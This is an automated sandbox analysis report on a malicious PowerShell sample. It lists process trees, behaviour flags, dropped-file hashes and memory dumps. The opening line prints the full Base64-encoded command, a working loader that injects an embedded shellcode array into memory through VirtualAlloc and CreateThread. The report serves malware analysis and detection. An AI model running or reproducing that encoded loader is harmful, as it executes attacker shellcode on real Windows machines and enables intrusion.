      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABHADQATQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEcANABNACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADcALAAwAHgAYgBiACwAMAB4ADIAMAAsADAAeAA2AGYALAAwAHgAMgA0ACwAMAB4AGEANQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEAMwAsADAAeAAwADMALAAwAHgANwA4ACwAMAB4ADcAYwAsADAAeABjADYALAAwAHgANQAwACwAMAB4ADgANAAsADAAeAA2AGEALAAwAHgAOAA5ACwAMAB4ADkAYgAsADAAeAA3ADQALAAwAHgANgBiACwAMAB4AGYANgAsADAAeAAxADIALAAwAHgAOQAxACwAMAB4ADUAYQAsADAAeAAyADQALAAwAHgANAAwACwAMAB4AGQAMgAsADAAeABjAGYALAAwAHgAZgA4ACwAMAB4ADAAMgAsADAAeABiADYALAAwAHgAZQAzACwAMAB4ADcAMwAsADAAeAA0ADYALAAwAHgAMgAyACwAMAB4ADcANwAsADAAeABmADEALAAwAHgANABmACwAMAB4ADcAYgAsADAAeAA3ADgALAAwAHgAZgA5ACwAMAB4ADMAOAAsADAAeAAzADEALAAwAHgAYQAwACwAMAB4ADMANwAsADAAeAA4ADcALAAwAHgANgA5ACwAMAB4ADkAMAAsADAAeAA1ADYALAAwAHgANwBiACwAMAB4ADcAMwAsADAAeABjADUALAAwAHgAYgA4ACwAMAB4ADQAMgAsADAAeABiAGMALAAwAHgAMQA4ACwAMAB4AGIAOAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANgAsADAAeAA1ADUALAAwAHgANQA5ACwAMAB4AGQAYwAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4ADQAZQAsADAAeAA2ADkALAAwAHgANgAxACwAMAB4AGMAMAAsADAAeAA2AGYALAAwAHgAYgBkACwAMAB4AGUAZAAsADAAeAA3ADgALAAwAHgAMAA4ACwAMAB4AGIAOAAsADAAeAAzADIALAAwAHgAMABjACwAMAB4AGEANAAsADAAeABjADMALAAwAHgANgAyACwAMAB4AGIAZAAsADAAeABiAGYALAAwAHgAOABiACwAMAB4ADkAYQAsADAAeABiADUALAAwAHgAOQA4ACwAMAB4ADIAYgAsADAAeAA5AGEALAAwAHgAMQBhACwAMAB4ADkAZAAsADAAeABlADIALAAwAHgAZQA4ACwAMAB4AGEAMAAsADAAeABkADcALAAwAHgANwBmACwAMAB4ADIANAAsADAAeAA1ADIALAAwAHgAZQA2ACwAMAB4AGEAOQAsADAAeAA3ADQALAAwAHgAOQBiACwAMAB4AGQAOAAsADAAeAA5ADUALAAwAHgAZABiACwAMAB4AGEAMgAsADAAeABkADQALAAwAHgAMQA4ACwAMAB4ADIANQAsADAAeABlADIALAAwAHgAZAAzACwAMAB4AGMAMgAsADAAeAA1ADAALAAwAHgAMQA4ACwAMAB4ADIAMAAsADAAeAA3AGYALAAwAHgANgAzACwAMAB4AGQAYgAsADAAeAA1AGEALAAwAHgANQBiACwAMAB4AGUANgAsADAAeABmAGMALAAwAHgAZgBkACwAMAB4ADIAOAAsADAAeAA1ADAALAAwAHgAZAA5ACwAMAB4AGYAYwAsADAAeABmAGQALAAwAHgAMAA3ACwAMAB4AGEAYQAsADAAeABmADMALAAwAHgANABhACwAMAB4ADQAMwAsADAAeABmADQALAAwAHgAMQA3ACwAMAB4ADQAZAAsADAAeAA4ADAALAAwAHgAOABlACwAMAB4ADIAYwAsADAAeABjADYALAAwAHgAMgA3ACwAMAB4ADQAMQAsADAAeABhADUALAAwAHgAOQBjACwAMAB4ADAAMwAsADAAeAA0ADUALAAwAHgAZQBkACwAMAB4ADQANwAsADAAeAAyAGQALAAwAHgAZABjACwAMAB4ADQAYgAsADAAeAAyADYALAAwAHgANQAyACwAMAB4ADMAZQAsADAAeAAzADMALAAwAHgAOQA3ACwAMAB4AGYANgAsADAAeAAzADQALAAwAHgAZAA2ACwAMAB4AGMAZQAsADAAeAA4ADcALAAwAHgAYgA0ACwAMAB4ADIAOAAsADAAeABlAGYALAAwAHgAZAA1ACwAMAB4ADIAMgAsADAAeABlADQALAAwAHgAMwBkACwAMAB4AGUANgAsADAAeABiADIALAAwAHgANgAyACwAMAB4ADMANgAsADAAeAA5ADUALAAwAHgAOAAwACwAMAB4ADIAZAAsADAAeABlAGMALAAwAHgAMwAxACwAMAB4AGEAOQAsADAAeABhADYALAAwAHgAMgBhACwAMAB4AGMANQAsADAAeABiADgALAAwAHgAYQAxACwAMAB4AGMAZAAsADAAeAAxADkALAAwAHgAMAAyACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOQBhACwAMAB4ADcAMwAsADAAeABlAGIALAAwAHgAZgA2ACwAMAB4AGMAZQAsADAAeAAyADMALAAwAHgAOAAzACwAMAB4AGQAZgAsADAAeAA2AGUALAAwAHgAYQA4ACwAMAB4ADUAMwAsADAAeABlADAALAAwAHgAYgBhACwAMAB4ADQANQAsADAAeAA1AGUALAAwAHgANwA2ACwAMAB4AGUAOAAsADAAeAA0AGUALAAwAHgAOAA1ACwAMAB4AGEAYgAsADAAeAA5AGEALAAwAHgANgBjACwAMAB4ADMAYQAsADAAeABhADQALAAwAHgAMgBjACwAMAB4AGYAOAAsADAAeABkAGMALAAwAHgAOQBhACwAMAB4ADgAMAAsADAAeABhAGEALAAwAHgANwAwACwAMAB4ADUAYQAsADAAeAA3ADEALAAwAHgAMABiACwAMAB4ADIAMQAsADAAeAAzADIALAAwAHgAOQBiACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgAMgAyACwAMAB4AGEANAAsADAAeAA0AGUALAAwAHgAMwA3ACwAMAB4AGMAOAAsADAAeAA0AGIALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA2ADQALAAwAHgAZgA1ACwAMAB4ADYAMgAsADAAeABmAGIALAAwAHgAMQA1ACwAMAB4AGYAYQAsADAAeABiADgALAAwAHgAOAAxACwAMAB4ADEANQAsADAAeAA3ADAALAAwAHgANABmACwAMAB4ADcANQAsADAAeABkAGIALAAwAHgANwAxACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOABiACwAMAB4ADcAMQAsADAAeAA3ADEALAAwAHgAZAA3ACwAMAB4ADEAZAAsADAAeAA4AGQALAAwAHgAYQBmACwAMAB4ADcAMgAsADAAeABhADEALAAwAHgAMQBiACwAMAB4ADUANAAsADAAeABkADUALAAwAHgAZgA2ACwAMAB4AGIAMwAsADAAeAA1ADYALAAwAHgAMAAwACwAMAB4ADMAMAAsADAAeAAxAGMALAAwAHgAYQA4ACwAMAB4ADYANwAsADAAeAA0AGIALAAwAHgAOQA1ACwAMAB4ADMAYwAsADAAeABjADgALAAwAHgAMgAzACwAMAB4AGQAYQAsADAAeABkADAALAAwAHgAYwA4ACwAMAB4AGIAMwAsADAAeAA4AGMALAAwAHgAYgBhACwAMAB4AGMAOAAsADAAeABkAGIALAAwAHgANgA4ACwAMAB4ADkAZgAsADAAeAA5AGEALAAwAHgAZgBlACwAMAB4ADcANgAsADAAeAAwAGEALAAwAHgAOABmACwAMAB4ADUAMwAsADAAeABlADMALAAwAHgAYgA1ACwAMAB4AGUANgAsADAAeAAwADAALAAwAHgAYQA0ACwAMAB4AGQAZAAsADAAeAAwADQALAAwAHgANwBmACwAMAB4ADgAMgAsADAAeAA0ADEALAAwAHgAZgA2ACwAMAB4AGEAYQAsADAAeAAxADIALAAwAHgAYgBkACwAMAB4ADIAMQAsADAAeAA5ADIALAAwAHgANgAwACwAMAB4AGEAZgAsADAAeABmADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHYANQBmAE0APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHYANQBmAE0ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHYANQBmAE0ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4728
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nqrc0pok\nqrc0pok.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3932
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B79.tmp" "c:\Users\Admin\AppData\Local\Temp\nqrc0pok\CSC19D38A94F5A4AE5B7DA65C3E11DFA.TMP"
        6⤵
        
        PID:4864

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5B79.tmp

Filesize
1KB

MD5
3ffc863683655134805b39cb9224732a

SHA1
56616f78212f59bb809a5039f4c3fd701f2b3e8a

SHA256
7881285c2c2c9b9ab1211c62d68010687adbf8083b73961dce851718a89c4bb4

SHA512
350ca7542473949b2658ca1291d0b123b0a1c02c7d870336b986e86e67cdfab3bfda2893cf1e10123328073744c481b165ad334a3ff5ffb611a30b631a45bbe2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fhxdtlf2.xv3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nqrc0pok\nqrc0pok.dll

Filesize
3KB

MD5
ab6e11fa33c061451f4e8ac090fbc6a5

SHA1
2c7ca22eea4abdc1f74cf004000746f30ab210ec

SHA256
9434d68469efd5b1701a458a4f14783946e41cc70756cf041ac945d91305b617

SHA512
a63ea8ffcd1a98a1e43def81ce3af3e6c3dd94eebf6c0f0636c2ac5f4dc1bf1e053a5f6099c310a7253166de84db34581e2202c53ff2b582adbaec4cdd054577

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nqrc0pok\CSC19D38A94F5A4AE5B7DA65C3E11DFA.TMP

Filesize
652B

MD5
5b89b22115dd4df35420c6e4f10e50c2

SHA1
ece817703070b3947ac1209b5b6338b0c112eea6

SHA256
5bafc20a4c77ced8b876a99452ed3b34659e2f2359b26e2d16355659e2ad1ab3

SHA512
b40a21709db0c513a25325a55c3a2e0b5e958f6ff091b1866f51e3de6d203bbac507bd6c5fb19446432d9c9ece30dbd504c4f86732bf2cf821e7cf696a5572ea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nqrc0pok\nqrc0pok.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nqrc0pok\nqrc0pok.cmdline

Filesize
369B

MD5
2b953eefb3ee7b8348f7c60be1816e78

SHA1
ccbc9591f593c905aca830b386241f68c40c8e1f

SHA256
b1d72e64bbb4b4bbc583567860e8e7bfbbd1bf0ef965767fc22783e6f2ef5b38

SHA512
195f9f3a12749f088ffaee619f1bec9f9c9e7afc193014fab783eca61a7dcd2987c47cc15df92bd4c2855cf3890697a92e4c3028a02d1d76aa0965a812e567ee

Download Submit
memory/2052-153-0x00007FF8C1EE0000-0x00007FF8C29A1000-memory.dmp

Filesize
10.8MB

Download
memory/2052-136-0x00007FF8C1EE0000-0x00007FF8C29A1000-memory.dmp

Filesize
10.8MB

Download
memory/2052-201-0x00007FF8C1EE0000-0x00007FF8C29A1000-memory.dmp

Filesize
10.8MB

Download
memory/2052-133-0x00000000003D0000-0x00000000003DA000-memory.dmp

Filesize
40KB

Download
memory/2056-164-0x000001C9F7F30000-0x000001C9F7F40000-memory.dmp

Filesize
64KB

Download
memory/2056-169-0x00007FF8C1EE0000-0x00007FF8C29A1000-memory.dmp

Filesize
10.8MB

Download
memory/2056-140-0x000001C9F8890000-0x000001C9F88B2000-memory.dmp

Filesize
136KB

Download
memory/2056-199-0x00007FF8C1EE0000-0x00007FF8C29A1000-memory.dmp

Filesize
10.8MB

Download
memory/2056-141-0x000001C9F7F30000-0x000001C9F7F40000-memory.dmp

Filesize
64KB

Download
memory/2056-146-0x000001C9F7F30000-0x000001C9F7F40000-memory.dmp

Filesize
64KB

Download
memory/2056-147-0x00007FF8C1EE0000-0x00007FF8C29A1000-memory.dmp

Filesize
10.8MB

Download
memory/2056-163-0x000001C9F7F30000-0x000001C9F7F40000-memory.dmp

Filesize
64KB

Download
memory/2056-148-0x000001C9F7F30000-0x000001C9F7F40000-memory.dmp

Filesize
64KB

Download
memory/4728-173-0x0000000006C20000-0x0000000006C3A000-memory.dmp

Filesize
104KB

Download
memory/4728-155-0x0000000005850000-0x0000000005872000-memory.dmp

Filesize
136KB

Download
memory/4728-171-0x00000000052B0000-0x00000000052C0000-memory.dmp

Filesize
64KB

Download
memory/4728-172-0x0000000007F30000-0x00000000085AA000-memory.dmp

Filesize
6.5MB

Download
memory/4728-151-0x0000000005110000-0x0000000005146000-memory.dmp

Filesize
216KB

Download
memory/4728-149-0x0000000074680000-0x0000000074E30000-memory.dmp

Filesize
7.7MB

Download
memory/4728-150-0x00000000052B0000-0x00000000052C0000-memory.dmp

Filesize
64KB

Download
memory/4728-157-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/4728-156-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/4728-170-0x0000000006700000-0x000000000671E000-memory.dmp

Filesize
120KB

Download
memory/4728-187-0x0000000006B70000-0x0000000006B71000-memory.dmp

Filesize
4KB

Download
memory/4728-188-0x0000000074680000-0x0000000074E30000-memory.dmp

Filesize
7.7MB

Download
memory/4728-189-0x0000000006B70000-0x0000000006B71000-memory.dmp

Filesize
4KB

Download
memory/4728-190-0x00000000052B0000-0x00000000052C0000-memory.dmp

Filesize
64KB

Download
memory/4728-191-0x00000000052B0000-0x00000000052C0000-memory.dmp

Filesize
64KB

Download
memory/4728-192-0x00000000052B0000-0x00000000052C0000-memory.dmp

Filesize
64KB

Download
memory/4728-196-0x0000000074680000-0x0000000074E30000-memory.dmp

Filesize
7.7MB

Download
memory/4728-152-0x00000000058F0000-0x0000000005F18000-memory.dmp

Filesize
6.2MB

Download
memory/4728-154-0x00000000052B0000-0x00000000052C0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads